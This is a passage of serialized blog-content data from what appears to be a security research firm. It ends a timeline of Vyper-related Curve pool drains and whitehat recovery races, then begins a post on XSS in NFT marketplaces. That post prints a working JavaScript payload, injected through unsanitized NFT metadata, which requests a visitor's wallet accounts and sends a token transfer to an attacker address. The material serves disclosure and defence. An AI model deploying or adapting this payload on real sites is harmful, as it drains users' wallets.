",{"type":25,"tag":162,"props":34894,"children":34897},{"href":34895,"rel":34896},"https://etherscan.io/tx/0x2e7dc8b2fb7e25fd00ed9565dcc0ad4546363171d5e00f196d48103983ae477c",[166],[34898],{"type":31,"value":34899},"somebody else stole the funds",{"type":31,"value":179},{"type":25,"tag":38,"props":34902,"children":34903},{},[34904],{"type":31,"value":34905},"The attack structure was largely different from either of our proofs of concept, so it was unlikely to have been a leak from our group. Regardless, this was pretty demoralizing.",{"type":25,"tag":38,"props":34907,"children":34908},{},[34909],{"type":31,"value":34910},"Nevertheless, there was more ground to cover.",{"type":25,"tag":38,"props":34912,"children":34913},{},[34914,34919],{"type":25,"tag":9273,"props":34915,"children":34916},{},[34917],{"type":31,"value":34918},"21:26 UTC",{"type":31,"value":34920}," Addison proposed an ambitious plan to recover the remaining assets in the CRVETH pool.",{"type":25,"tag":34,"props":34922,"children":34923},{},[34924],{"type":25,"tag":38,"props":34925,"children":34926},{},[34927,34929,34933,34935,34938,34940,34943,34945],{"type":31,"value":34928},"if you send like 30k crv to the crv/eth pool ",{"type":25,"tag":34930,"props":34931,"children":34932},"br",{},[],{"type":31,"value":34934},"\nyou can then update admin fee ",{"type":25,"tag":34930,"props":34936,"children":34937},{},[],{"type":31,"value":34939},"\nand then the crv/eth rate is like .15 eth per crv ",{"type":25,"tag":34930,"props":34941,"children":34942},{},[],{"type":31,"value":34944},"\nso you can basically drain whole pool for few hundred K crv ",{"type":25,"tag":34930,"props":34946,"children":34947},{},[],{"type":25,"tag":38,"props":34949,"children":34950},{},[34951,34956],{"type":25,"tag":9273,"props":34952,"children":34953},{},[34954],{"type":31,"value":34955},"21:52 UTC",{"type":31,"value":34957}," bpak had produced a working proof of concept which could recover 3100 ETH.",{"type":25,"tag":38,"props":34959,"children":34960},{},[34961,34963,34970,34972,34979,34987],{"type":31,"value":34962},"Ten minutes later at 22:02 UTC, we were beaten again. By some freak concidence, the ",{"type":25,"tag":162,"props":34964,"children":34967},{"href":34965,"rel":34966},"https://etherscan.io/address/0x8c73d39b2da2dd1a10cc16502bc7c8d768ec74c9",[166],[34968],{"type":31,"value":34969},"CRV admin fee bot",{"type":31,"value":34971}," had claimed fees and ",{"type":25,"tag":162,"props":34973,"children":34976},{"href":34974,"rel":34975},"https://etherscan.io/tx/0xcd99fadd7e28a42a063e07d9d86f67c88e10a7afe5921bd28cd1124924ae2052",[166],[34977],{"type":31,"value":34978},"the pool was drained",{"type":25,"tag":19431,"props":34980,"children":34981},{},[34982],{"type":25,"tag":162,"props":34983,"children":34985},{"href":33584,"ariaDescribedBy":34984,"dataFootnoteRef":7,"id":33586},[19438],[34986],{"type":31,"value":184},{"type":31,"value":179},{"type":25,"tag":26,"props":34989,"children":34991},{"id":34990},"blame",[34992],{"type":31,"value":34993},"Blame",{"type":25,"tag":38,"props":34995,"children":34996},{},[34997,35001],{"type":25,"tag":64,"props":34998,"children":34999},{},[35000],{"type":31,"value":34993},{"type":31,"value":35002}," is a strong word. It's not productive to point fingers. At the same time, I think it's useful to think about what could have went better.",{"type":25,"tag":606,"props":35004,"children":35006},{"id":35005},"races",[35007],{"type":31,"value":35008},"Races",{"type":25,"tag":38,"props":35010,"children":35011},{},[35012],{"type":31,"value":35013},"In both cases, whitehat efforts were beaten by less than half an hour. Sometimes every second really does count.",{"type":25,"tag":38,"props":35015,"children":35016},{},[35017],{"type":31,"value":35018},"There likely could have been better preparation and resources for executing on these attacks. At the same time, this seems like a double-edged sword. Is it really a good idea to aggregate information related how to execute a hack? Who should we trust?",{"type":25,"tag":38,"props":35020,"children":35021},{},[35022],{"type":31,"value":35023},"On the other hand, I think the process was quite efficient. We went from initial suspicions to identifying vulnerable variants in 2 hours and 4 minutes.",{"type":25,"tag":606,"props":35025,"children":35027},{"id":35026},"information-leakage",[35028],{"type":31,"value":35029},"Information Leakage",{"type":25,"tag":38,"props":35031,"children":35032},{},[35033],{"type":31,"value":35034},"I was both an auditor and a whitehat.",{"type":25,"tag":38,"props":35036,"children":35037},{},[35038,35040,35047],{"type":31,"value":35039},"There's a strong culture of publishing in auditing. We're paid for technical thought leadership and deep understanding of vulnerabilities. One way to demonstrate this is ",{"type":25,"tag":162,"props":35041,"children":35044},{"href":35042,"rel":35043},"https://twitter.com/osec_io/status/1579969927020412929",[166],[35045],{"type":31,"value":35046},"by publishing the \"scoop\"",{"type":31,"value":35048}," on hacks in the wild. Researchers cost a lot and the return on investment is publicity.",{"type":25,"tag":38,"props":35050,"children":35051},{},[35052],{"type":31,"value":35053},"On the other hand, there's a compelling argument that early disclosure of the affected versions had a material impact on the whitehat recovery.",{"type":25,"tag":38,"props":35055,"children":35056},{},[35057],{"type":31,"value":35058},"Half an hour more could have saved $18M.",{"type":25,"tag":38,"props":35060,"children":35061},{},[35062],{"type":31,"value":35063},"Auditors don't pay for externalities created by their reporting. Instead, they get rewarded with likes, retweets, and publicity. Seems like a hard problem.",{"type":25,"tag":26,"props":35065,"children":35067},{"id":35066},"next-steps",[35068],{"type":31,"value":35069},"Next Steps",{"type":25,"tag":38,"props":35071,"children":35072},{},[35073],{"type":31,"value":35074},"I disagree with takes like \"we need formal verification to solve this\". This bug could have been caught with a unit test. Formal verification is very useful for many bug classes, but I'm not convinced it's as useful for relatively simple, non-optimizing compilers.",{"type":25,"tag":38,"props":35076,"children":35077},{},[35078,35080,35087],{"type":31,"value":35079},"It's important to note that this bug ",{"type":25,"tag":162,"props":35081,"children":35084},{"href":35082,"rel":35083},"https://twitter.com/real_philogy/status/1685948253139857409",[166],[35085],{"type":31,"value":35086},"was patched since November 2021",{"type":31,"value":179},{"type":25,"tag":34,"props":35089,"children":35090},{},[35091],{"type":25,"tag":38,"props":35092,"children":35093},{},[35094,35096,35101,35102,35105,35107,35112],{"type":31,"value":35095},"I think this Vyper 0day is less about the skill of the Vyper team or the language itself but more about ",{"type":25,"tag":64,"props":35097,"children":35098},{},[35099],{"type":31,"value":35100},"processes",{"type":31,"value":22491},{"type":25,"tag":34930,"props":35103,"children":35104},{},[],{"type":31,"value":35106},"\nThe bug was a fixed many versions of Vyper ago, the actual oversight was not realizing the potential impact to projects at the time it ",{"type":25,"tag":64,"props":35108,"children":35109},{},[35110],{"type":31,"value":35111},"was",{"type":31,"value":35113}," fixed.",{"type":25,"tag":38,"props":35115,"children":35116},{},[35117],{"type":31,"value":35118},"Unfortunately, public goods get easily forgotten. With immutable contracts, projects can have implicit dependencies on code written years ago. Protocol developers and security experts should stay up to date on security developments across the entire execution stack.",{"type":25,"tag":22381,"props":35120,"children":35122},{"className":35121,"dataFootnotes":7},[22384],[35123,35128],{"type":25,"tag":26,"props":35124,"children":35126},{"className":35125,"id":19438},[22389],[35127],{"type":31,"value":22392},{"type":25,"tag":6711,"props":35129,"children":35130},{},[35131],{"type":25,"tag":2043,"props":35132,"children":35133},{"id":34327},[35134,35136],{"type":31,"value":35135},"Thankfully, these funds were later returned. ",{"type":25,"tag":162,"props":35137,"children":35139},{"href":34355,"ariaLabel":22495,"className":35138,"dataFootnoteBackref":7},[22497],[35140],{"type":31,"value":22500},{"type":25,"tag":9316,"props":35142,"children":35143},{},[35144],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":35146},[35147,35148,35152,35153],{"id":34422,"depth":6769,"text":34425},{"id":34990,"depth":6769,"text":34993,"children":35149},[35150,35151],{"id":35005,"depth":6778,"text":35008},{"id":35026,"depth":6778,"text":35029},{"id":35066,"depth":6769,"text":35069},{"id":19438,"depth":6769,"text":22392},"content:blog:2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline",{"_path":35158,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":35159,"description":35160,"author":35161,"image":35164,"date":35166,"isFeatured":16,"tags":35167,"onBlogPage":16,"body":35170,"_type":6798,"_id":39381,"_source":6800,"_file":39382,"_stem":39383,"_extension":6803},"/blog/2023-08-11-web2-bug-repellant-instructions","Web2 Bug Repellant Instructions","An analysis of security risks that don’t get enough attention - web2 bugs in web3 apps. We take a deep and practical look at vulnerabilities across various applications.",[35162,35163],"caue","bruno",{"src":35165,"height":17580,"width":17580},"/posts/web2-bug-repellant-instructions/web2-bug-repellant-instructions.jpg","2023-08-11",[35168,35169],"nft-marketplaces","xss",{"type":22,"children":35171,"toc":39364},[35172,35176,35181,35185,35190,35195,35200,35216,35222,35235,35257,35264,35269,35276,35281,35287,35292,35297,35302,35307,35318,35323,36292,36302,36314,36321,36326,37147,37152,37157,37162,37167,37951,37956,38038,38043,38112,38118,38123,38128,38355,38368,38373,38378,38383,38390,38395,38402,38408,38413,38418,38423,38742,38747,38753,38769,38775,38780,38785,38795,38800,38805,38814,38819,38825,38841,38854,38859,38864,38884,38891,38896,38903,38912,38917,38938,38991,38996,39047,39061,39066,39080,39195,39218,39302,39325,39330,39335,39339,39344,39349,39355,39360],{"type":25,"tag":26,"props":35173,"children":35174},{"id":32975},[35175],{"type":31,"value":32978},{"type":25,"tag":38,"props":35177,"children":35178},{},[35179],{"type":31,"value":35180},"Transitioning to a fully decentralized web is hard. Many Web 3 applications still have large, unexplored Web 2 attack surfaces.",{"type":25,"tag":606,"props":35182,"children":35183},{"id":6853},[35184],{"type":31,"value":6856},{"type":25,"tag":38,"props":35186,"children":35187},{},[35188],{"type":31,"value":35189},"In this blog post, we'll explore these lingering threats and potential mitigations. This work summarizes our internal research against various applications, from NFT marketplaces to wallets to protocol frontends.",{"type":25,"tag":38,"props":35191,"children":35192},{},[35193],{"type":31,"value":35194},"As a note, generally applications with non-trivial frontends are more susceptible to these vulnerabilities. Hence, a lot of our research focused on the interactions with NFTs, an ideal Web 2.5 candidate in many senses.",{"type":25,"tag":26,"props":35196,"children":35197},{"id":35169},[35198],{"type":31,"value":35199},"XSS",{"type":25,"tag":38,"props":35201,"children":35202},{},[35203],{"type":25,"tag":64,"props":35204,"children":35205},{},[35206,35208,35215],{"type":31,"value":35207},"I cannot make you understand. I cannot make anyone understand what is happening inside me. I cannot ",{"type":25,"tag":162,"props":35209,"children":35212},{"href":35210,"rel":35211},"https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting",[166],[35213],{"type":31,"value":35214},"even explain it to myself",{"type":31,"value":179},{"type":25,"tag":606,"props":35217,"children":35219},{"id":35218},"managing-metadata",[35220],{"type":31,"value":35221},"Managing Metadata",{"type":25,"tag":38,"props":35223,"children":35224},{},[35225,35227,35234],{"type":31,"value":35226},"Effectively managing metadata is a challenge. When improperly sanitized, unsuspecting metadata becomes a dangerous sink for malicious ",{"type":25,"tag":162,"props":35228,"children":35231},{"href":35229,"rel":35230},"https://www.vice.com/en/article/xgdvaz/nft-steal-ip-address-opensea",[166],[35232],{"type":31,"value":35233},"payloads",{"type":31,"value":179},{"type":25,"tag":38,"props":35236,"children":35237},{},[35238,35240,35247,35249,35255],{"type":31,"value":35239},"We showcase this vulnerability in the ",{"type":25,"tag":162,"props":35241,"children":35244},{"href":35242,"rel":35243},"https://rocki.com/",[166],[35245],{"type":31,"value":35246},"Rocki Marketplace",{"type":31,"value":35248},". The ",{"type":25,"tag":82,"props":35250,"children":35252},{"className":35251},[],[35253],{"type":31,"value":35254},"artistDescription",{"type":31,"value":35256}," parameter was improperly sanitized, allowing arbitrary HTML input without any validation checks!",{"type":25,"tag":38,"props":35258,"children":35259},{},[35260],{"type":25,"tag":6467,"props":35261,"children":35263},{"alt":7,"src":35262},"/posts/web2-bug-repellant-instructions/metadata.png",[],{"type":25,"tag":38,"props":35265,"children":35266},{},[35267],{"type":31,"value":35268},"When a user loads such a maliciously constructed NFT, they'll unwittingly execute our payload, giving us full control over their account.",{"type":25,"tag":38,"props":35270,"children":35271},{},[35272],{"type":25,"tag":6467,"props":35273,"children":35275},{"alt":7,"src":35274},"/posts/web2-bug-repellant-instructions/xss.png",[],{"type":25,"tag":38,"props":35277,"children":35278},{},[35279],{"type":31,"value":35280},"Of course, this is merely a toy payload. An actual hacker could use this to spread through the marketplace, creating a wormable payload that takes over the entire website.",{"type":25,"tag":606,"props":35282,"children":35284},{"id":35283},"wheres-my-wallet",[35285],{"type":31,"value":35286},"Where's My Wallet",{"type":25,"tag":38,"props":35288,"children":35289},{},[35290],{"type":31,"value":35291},"What's the worst that can happen? How does losing your wallet funds sound?",{"type":25,"tag":38,"props":35293,"children":35294},{},[35295],{"type":31,"value":35296},"Note that triggering this exploit requires some interaction. However, in practice users likely are not carefully examining the wallet prompts, especially on familiar sites.",{"type":25,"tag":38,"props":35298,"children":35299},{},[35300],{"type":31,"value":35301},"It is important to recognize that the presence of XSS in marketplaces can trigger the approval prompt in various wallets, including the attacker's assets.",{"type":25,"tag":38,"props":35303,"children":35304},{},[35305],{"type":31,"value":35306},"In the following example, this malicious transaction was initiated by a malicious code injected into rocki.com.",{"type":25,"tag":35308,"props":35309,"children":35311},"div",{"style":35310},"display:flex; align-items:center; flex-direction:column;",[35312],{"type":25,"tag":6467,"props":35313,"children":35317},{"src":35314,"alt":35315,"style":35316},"/posts/web2-bug-repellant-instructions/metamask.png","Wallet","max-height:550px;",[],{"type":25,"tag":38,"props":35319,"children":35320},{},[35321],{"type":31,"value":35322},"And here we can find the code used to achieve it :",{"type":25,"tag":206,"props":35324,"children":35328},{"className":35325,"code":35326,"language":35327,"meta":7,"style":7},"language-js shiki shiki-themes slack-dark","function request() {\n  if (typeof window.ethereum === 'undefined') {\n    console.error('Please install MetaMask to use this feature.');\n  } else {\n    ethereum.request({ method: 'eth_requestAccounts' }).then((accounts) => {\n      const fromAddress = accounts[0];\n      const attackerAddress = '0x0000000000000000000000000000000000000000';\n      const contractAddress = '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3';\n\n      let tokenAbi = [\n        {\n          constant: false,\n          inputs: [\n            {\n              name: '_to',\n              type: 'address',\n            },\n            {\n              name: '_value',\n              type: 'uint256',\n            },\n          ],\n          name: 'transfer',\n          outputs: [\n            {\n              name: '',\n              type: 'bool',\n            },\n          ],\n          type: 'function',\n        },\n      ];\n\n      const web3 = new Web3(window.ethereum);\n\n      const tokenContract = new web3.eth.Contract(tokenAbi, contractAddress);\n\n      const transactionObject = {\n        from: fromAddress,\n        to: contractAddress,\n        data: tokenContract.methods\n          .transfer(attackerAddress, web3.utils.toWei('100000000', 'ether'))\n          .encodeABI(),\n      };\n\n      web3.eth.sendTransaction(transactionObject);\n    });\n  }\n}\n\nimport('https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js');\nsetTimeout(request, 1e3);\n","js",[35329],{"type":25,"tag":82,"props":35330,"children":35331},{"__ignoreMap":7},[35332,35349,35394,35423,35439,35502,35537,35562,35587,35594,35614,35622,35638,35650,35658,35675,35692,35700,35707,35723,35739,35746,35754,35771,35783,35790,35806,35822,35829,35836,35853,35860,35868,35875,35922,35929,35993,36000,36020,36036,36052,36073,36144,36160,36167,36174,36212,36220,36227,36234,36241,36262],{"type":25,"tag":216,"props":35333,"children":35334},{"class":6922,"line":6923},[35335,35340,35345],{"type":25,"tag":216,"props":35336,"children":35337},{"style":6936},[35338],{"type":31,"value":35339},"function",{"type":25,"tag":216,"props":35341,"children":35342},{"style":7047},[35343],{"type":31,"value":35344}," request",{"type":25,"tag":216,"props":35346,"children":35347},{"style":6964},[35348],{"type":31,"value":19694},{"type":25,"tag":216,"props":35350,"children":35351},{"class":6922,"line":6769},[35352,35357,35361,35366,35371,35375,35380,35385,35390],{"type":25,"tag":216,"props":35353,"children":35354},{"style":6973},[35355],{"type":31,"value":35356},"  if",{"type":25,"tag":216,"props":35358,"children":35359},{"style":6964},[35360],{"type":31,"value":7016},{"type":25,"tag":216,"props":35362,"children":35363},{"style":6936},[35364],{"type":31,"value":35365},"typeof",{"type":25,"tag":216,"props":35367,"children":35368},{"style":6947},[35369],{"type":31,"value":35370}," window",{"type":25,"tag":216,"props":35372,"children":35373},{"style":6964},[35374],{"type":31,"value":179},{"type":25,"tag":216,"props":35376,"children":35377},{"style":6947},[35378],{"type":31,"value":35379},"ethereum",{"type":25,"tag":216,"props":35381,"children":35382},{"style":6953},[35383],{"type":31,"value":35384}," ===",{"type":25,"tag":216,"props":35386,"children":35387},{"style":8205},[35388],{"type":31,"value":35389}," 'undefined'",{"type":25,"tag":216,"props":35391,"children":35392},{"style":6964},[35393],{"type":31,"value":18761},{"type":25,"tag":216,"props":35395,"children":35396},{"class":6922,"line":6778},[35397,35402,35406,35410,35414,35419],{"type":25,"tag":216,"props":35398,"children":35399},{"style":6947},[35400],{"type":31,"value":35401},"    console",{"type":25,"tag":216,"props":35403,"children":35404},{"style":6964},[35405],{"type":31,"value":179},{"type":25,"tag":216,"props":35407,"children":35408},{"style":7047},[35409],{"type":31,"value":18821},{"type":25,"tag":216,"props":35411,"children":35412},{"style":6964},[35413],{"type":31,"value":1850},{"type":25,"tag":216,"props":35415,"children":35416},{"style":8205},[35417],{"type":31,"value":35418},"'Please install MetaMask to use this feature.'",{"type":25,"tag":216,"props":35420,"children":35421},{"style":6964},[35422],{"type":31,"value":7797},{"type":25,"tag":216,"props":35424,"children":35425},{"class":6922,"line":7005},[35426,35431,35435],{"type":25,"tag":216,"props":35427,"children":35428},{"style":6964},[35429],{"type":31,"value":35430},"  } ",{"type":25,"tag":216,"props":35432,"children":35433},{"style":6973},[35434],{"type":31,"value":7268},{"type":25,"tag":216,"props":35436,"children":35437},{"style":6964},[35438],{"type":31,"value":7241},{"type":25,"tag":216,"props":35440,"children":35441},{"class":6922,"line":7110},[35442,35447,35451,35456,35461,35466,35471,35476,35481,35486,35490,35494,35498],{"type":25,"tag":216,"props":35443,"children":35444},{"style":6947},[35445],{"type":31,"value":35446},"    ethereum",{"type":25,"tag":216,"props":35448,"children":35449},{"style":6964},[35450],{"type":31,"value":179},{"type":25,"tag":216,"props":35452,"children":35453},{"style":7047},[35454],{"type":31,"value":35455},"request",{"type":25,"tag":216,"props":35457,"children":35458},{"style":6964},[35459],{"type":31,"value":35460},"({ ",{"type":25,"tag":216,"props":35462,"children":35463},{"style":6947},[35464],{"type":31,"value":35465},"method:",{"type":25,"tag":216,"props":35467,"children":35468},{"style":8205},[35469],{"type":31,"value":35470}," 'eth_requestAccounts'",{"type":25,"tag":216,"props":35472,"children":35473},{"style":6964},[35474],{"type":31,"value":35475}," }).",{"type":25,"tag":216,"props":35477,"children":35478},{"style":7047},[35479],{"type":31,"value":35480},"then",{"type":25,"tag":216,"props":35482,"children":35483},{"style":6964},[35484],{"type":31,"value":35485},"((",{"type":25,"tag":216,"props":35487,"children":35488},{"style":6947},[35489],{"type":31,"value":18632},{"type":25,"tag":216,"props":35491,"children":35492},{"style":6964},[35493],{"type":31,"value":7036},{"type":25,"tag":216,"props":35495,"children":35496},{"style":6936},[35497],{"type":31,"value":18779},{"type":25,"tag":216,"props":35499,"children":35500},{"style":6964},[35501],{"type":31,"value":7241},{"type":25,"tag":216,"props":35503,"children":35504},{"class":6922,"line":7216},[35505,35510,35515,35519,35524,35528,35532],{"type":25,"tag":216,"props":35506,"children":35507},{"style":6936},[35508],{"type":31,"value":35509},"      const",{"type":25,"tag":216,"props":35511,"children":35512},{"style":6947},[35513],{"type":31,"value":35514}," fromAddress",{"type":25,"tag":216,"props":35516,"children":35517},{"style":6953},[35518],{"type":31,"value":6956},{"type":25,"tag":216,"props":35520,"children":35521},{"style":6947},[35522],{"type":31,"value":35523}," accounts",{"type":25,"tag":216,"props":35525,"children":35526},{"style":6964},[35527],{"type":31,"value":7701},{"type":25,"tag":216,"props":35529,"children":35530},{"style":6989},[35531],{"type":31,"value":1882},{"type":25,"tag":216,"props":35533,"children":35534},{"style":6964},[35535],{"type":31,"value":35536},"];\n",{"type":25,"tag":216,"props":35538,"children":35539},{"class":6922,"line":7244},[35540,35544,35549,35553,35558],{"type":25,"tag":216,"props":35541,"children":35542},{"style":6936},[35543],{"type":31,"value":35509},{"type":25,"tag":216,"props":35545,"children":35546},{"style":6947},[35547],{"type":31,"value":35548}," attackerAddress",{"type":25,"tag":216,"props":35550,"children":35551},{"style":6953},[35552],{"type":31,"value":6956},{"type":25,"tag":216,"props":35554,"children":35555},{"style":8205},[35556],{"type":31,"value":35557}," '0x0000000000000000000000000000000000000000'",{"type":25,"tag":216,"props":35559,"children":35560},{"style":6964},[35561],{"type":31,"value":6967},{"type":25,"tag":216,"props":35563,"children":35564},{"class":6922,"line":7257},[35565,35569,35574,35578,35583],{"type":25,"tag":216,"props":35566,"children":35567},{"style":6936},[35568],{"type":31,"value":35509},{"type":25,"tag":216,"props":35570,"children":35571},{"style":6947},[35572],{"type":31,"value":35573}," contractAddress",{"type":25,"tag":216,"props":35575,"children":35576},{"style":6953},[35577],{"type":31,"value":6956},{"type":25,"tag":216,"props":35579,"children":35580},{"style":8205},[35581],{"type":31,"value":35582}," '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3'",{"type":25,"tag":216,"props":35584,"children":35585},{"style":6964},[35586],{"type":31,"value":6967},{"type":25,"tag":216,"props":35588,"children":35589},{"class":6922,"line":7275},[35590],{"type":25,"tag":216,"props":35591,"children":35592},{"emptyLinePlaceholder":16},[35593],{"type":31,"value":7642},{"type":25,"tag":216,"props":35595,"children":35596},{"class":6922,"line":7296},[35597,35601,35606,35610],{"type":25,"tag":216,"props":35598,"children":35599},{"style":6936},[35600],{"type":31,"value":12027},{"type":25,"tag":216,"props":35602,"children":35603},{"style":6947},[35604],{"type":31,"value":35605}," tokenAbi",{"type":25,"tag":216,"props":35607,"children":35608},{"style":6953},[35609],{"type":31,"value":6956},{"type":25,"tag":216,"props":35611,"children":35612},{"style":6964},[35613],{"type":31,"value":29579},{"type":25,"tag":216,"props":35615,"children":35616},{"class":6922,"line":7305},[35617],{"type":25,"tag":216,"props":35618,"children":35619},{"style":6964},[35620],{"type":31,"value":35621},"        {\n",{"type":25,"tag":216,"props":35623,"children":35624},{"class":6922,"line":7557},[35625,35630,35634],{"type":25,"tag":216,"props":35626,"children":35627},{"style":6947},[35628],{"type":31,"value":35629},"          constant:",{"type":25,"tag":216,"props":35631,"children":35632},{"style":6936},[35633],{"type":31,"value":13012},{"type":25,"tag":216,"props":35635,"children":35636},{"style":6964},[35637],{"type":31,"value":7465},{"type":25,"tag":216,"props":35639,"children":35640},{"class":6922,"line":7574},[35641,35646],{"type":25,"tag":216,"props":35642,"children":35643},{"style":6947},[35644],{"type":31,"value":35645},"          inputs:",{"type":25,"tag":216,"props":35647,"children":35648},{"style":6964},[35649],{"type":31,"value":29579},{"type":25,"tag":216,"props":35651,"children":35652},{"class":6922,"line":7591},[35653],{"type":25,"tag":216,"props":35654,"children":35655},{"style":6964},[35656],{"type":31,"value":35657},"            {\n",{"type":25,"tag":216,"props":35659,"children":35660},{"class":6922,"line":7604},[35661,35666,35671],{"type":25,"tag":216,"props":35662,"children":35663},{"style":6947},[35664],{"type":31,"value":35665},"              name:",{"type":25,"tag":216,"props":35667,"children":35668},{"style":8205},[35669],{"type":31,"value":35670}," '_to'",{"type":25,"tag":216,"props":35672,"children":35673},{"style":6964},[35674],{"type":31,"value":7465},{"type":25,"tag":216,"props":35676,"children":35677},{"class":6922,"line":7613},[35678,35683,35688],{"type":25,"tag":216,"props":35679,"children":35680},{"style":6947},[35681],{"type":31,"value":35682},"              type:",{"type":25,"tag":216,"props":35684,"children":35685},{"style":8205},[35686],{"type":31,"value":35687}," 'address'",{"type":25,"tag":216,"props":35689,"children":35690},{"style":6964},[35691],{"type":31,"value":7465},{"type":25,"tag":216,"props":35693,"children":35694},{"class":6922,"line":7636},[35695],{"type":25,"tag":216,"props":35696,"children":35697},{"style":6964},[35698],{"type":31,"value":35699},"            },\n",{"type":25,"tag":216,"props":35701,"children":35702},{"class":6922,"line":7645},[35703],{"type":25,"tag":216,"props":35704,"children":35705},{"style":6964},[35706],{"type":31,"value":35657},{"type":25,"tag":216,"props":35708,"children":35709},{"class":6922,"line":7654},[35710,35714,35719],{"type":25,"tag":216,"props":35711,"children":35712},{"style":6947},[35713],{"type":31,"value":35665},{"type":25,"tag":216,"props":35715,"children":35716},{"style":8205},[35717],{"type":31,"value":35718}," '_value'",{"type":25,"tag":216,"props":35720,"children":35721},{"style":6964},[35722],{"type":31,"value":7465},{"type":25,"tag":216,"props":35724,"children":35725},{"class":6922,"line":7722},[35726,35730,35735],{"type":25,"tag":216,"props":35727,"children":35728},{"style":6947},[35729],{"type":31,"value":35682},{"type":25,"tag":216,"props":35731,"children":35732},{"style":8205},[35733],{"type":31,"value":35734}," 'uint256'",{"type":25,"tag":216,"props":35736,"children":35737},{"style":6964},[35738],{"type":31,"value":7465},{"type":25,"tag":216,"props":35740,"children":35741},{"class":6922,"line":7730},[35742],{"type":25,"tag":216,"props":35743,"children":35744},{"style":6964},[35745],{"type":31,"value":35699},{"type":25,"tag":216,"props":35747,"children":35748},{"class":6922,"line":7760},[35749],{"type":25,"tag":216,"props":35750,"children":35751},{"style":6964},[35752],{"type":31,"value":35753},"          ],\n",{"type":25,"tag":216,"props":35755,"children":35756},{"class":6922,"line":7768},[35757,35762,35767],{"type":25,"tag":216,"props":35758,"children":35759},{"style":6947},[35760],{"type":31,"value":35761},"          name:",{"type":25,"tag":216,"props":35763,"children":35764},{"style":8205},[35765],{"type":31,"value":35766}," 'transfer'",{"type":25,"tag":216,"props":35768,"children":35769},{"style":6964},[35770],{"type":31,"value":7465},{"type":25,"tag":216,"props":35772,"children":35773},{"class":6922,"line":7800},[35774,35779],{"type":25,"tag":216,"props":35775,"children":35776},{"style":6947},[35777],{"type":31,"value":35778},"          outputs:",{"type":25,"tag":216,"props":35780,"children":35781},{"style":6964},[35782],{"type":31,"value":29579},{"type":25,"tag":216,"props":35784,"children":35785},{"class":6922,"line":7808},[35786],{"type":25,"tag":216,"props":35787,"children":35788},{"style":6964},[35789],{"type":31,"value":35657},{"type":25,"tag":216,"props":35791,"children":35792},{"class":6922,"line":7868},[35793,35797,35802],{"type":25,"tag":216,"props":35794,"children":35795},{"style":6947},[35796],{"type":31,"value":35665},{"type":25,"tag":216,"props":35798,"children":35799},{"style":8205},[35800],{"type":31,"value":35801}," ''",{"type":25,"tag":216,"props":35803,"children":35804},{"style":6964},[35805],{"type":31,"value":7465},{"type":25,"tag":216,"props":35807,"children":35808},{"class":6922,"line":13001},[35809,35813,35818],{"type":25,"tag":216,"props":35810,"children":35811},{"style":6947},[35812],{"type":31,"value":35682},{"type":25,"tag":216,"props":35814,"children":35815},{"style":8205},[35816],{"type":31,"value":35817}," 'bool'",{"type":25,"tag":216,"props":35819,"children":35820},{"style":6964},[35821],{"type":31,"value":7465},{"type":25,"tag":216,"props":35823,"children":35824},{"class":6922,"line":13019},[35825],{"type":25,"tag":216,"props":35826,"children":35827},{"style":6964},[35828],{"type":31,"value":35699},{"type":25,"tag":216,"props":35830,"children":35831},{"class":6922,"line":13064},[35832],{"type":25,"tag":216,"props":35833,"children":35834},{"style":6964},[35835],{"type":31,"value":35753},{"type":25,"tag":216,"props":35837,"children":35838},{"class":6922,"line":13170},[35839,35844,35849],{"type":25,"tag":216,"props":35840,"children":35841},{"style":6947},[35842],{"type":31,"value":35843},"          type:",{"type":25,"tag":216,"props":35845,"children":35846},{"style":8205},[35847],{"type":31,"value":35848}," 'function'",{"type":25,"tag":216,"props":35850,"children":35851},{"style":6964},[35852],{"type":31,"value":7465},{"type":25,"tag":216,"props":35854,"children":35855},{"class":6922,"line":27455},[35856],{"type":25,"tag":216,"props":35857,"children":35858},{"style":6964},[35859],{"type":31,"value":29331},{"type":25,"tag":216,"props":35861,"children":35862},{"class":6922,"line":27490},[35863],{"type":25,"tag":216,"props":35864,"children":35865},{"style":6964},[35866],{"type":31,"value":35867},"      ];\n",{"type":25,"tag":216,"props":35869,"children":35870},{"class":6922,"line":27498},[35871],{"type":25,"tag":216,"props":35872,"children":35873},{"emptyLinePlaceholder":16},[35874],{"type":31,"value":7642},{"type":25,"tag":216,"props":35876,"children":35877},{"class":6922,"line":27506},[35878,35882,35887,35891,35896,35901,35905,35910,35914,35918],{"type":25,"tag":216,"props":35879,"children":35880},{"style":6936},[35881],{"type":31,"value":35509},{"type":25,"tag":216,"props":35883,"children":35884},{"style":6947},[35885],{"type":31,"value":35886}," web3",{"type":25,"tag":216,"props":35888,"children":35889},{"style":6953},[35890],{"type":31,"value":6956},{"type":25,"tag":216,"props":35892,"children":35893},{"style":6936},[35894],{"type":31,"value":35895}," new",{"type":25,"tag":216,"props":35897,"children":35898},{"style":7047},[35899],{"type":31,"value":35900}," Web3",{"type":25,"tag":216,"props":35902,"children":35903},{"style":6964},[35904],{"type":31,"value":1850},{"type":25,"tag":216,"props":35906,"children":35907},{"style":6947},[35908],{"type":31,"value":35909},"window",{"type":25,"tag":216,"props":35911,"children":35912},{"style":6964},[35913],{"type":31,"value":179},{"type":25,"tag":216,"props":35915,"children":35916},{"style":6947},[35917],{"type":31,"value":35379},{"type":25,"tag":216,"props":35919,"children":35920},{"style":6964},[35921],{"type":31,"value":7797},{"type":25,"tag":216,"props":35923,"children":35924},{"class":6922,"line":27515},[35925],{"type":25,"tag":216,"props":35926,"children":35927},{"emptyLinePlaceholder":16},[35928],{"type":31,"value":7642},{"type":25,"tag":216,"props":35930,"children":35931},{"class":6922,"line":27557},[35932,35936,35941,35945,35949,35953,35957,35962,35966,35971,35975,35980,35984,35989],{"type":25,"tag":216,"props":35933,"children":35934},{"style":6936},[35935],{"type":31,"value":35509},{"type":25,"tag":216,"props":35937,"children":35938},{"style":6947},[35939],{"type":31,"value":35940}," 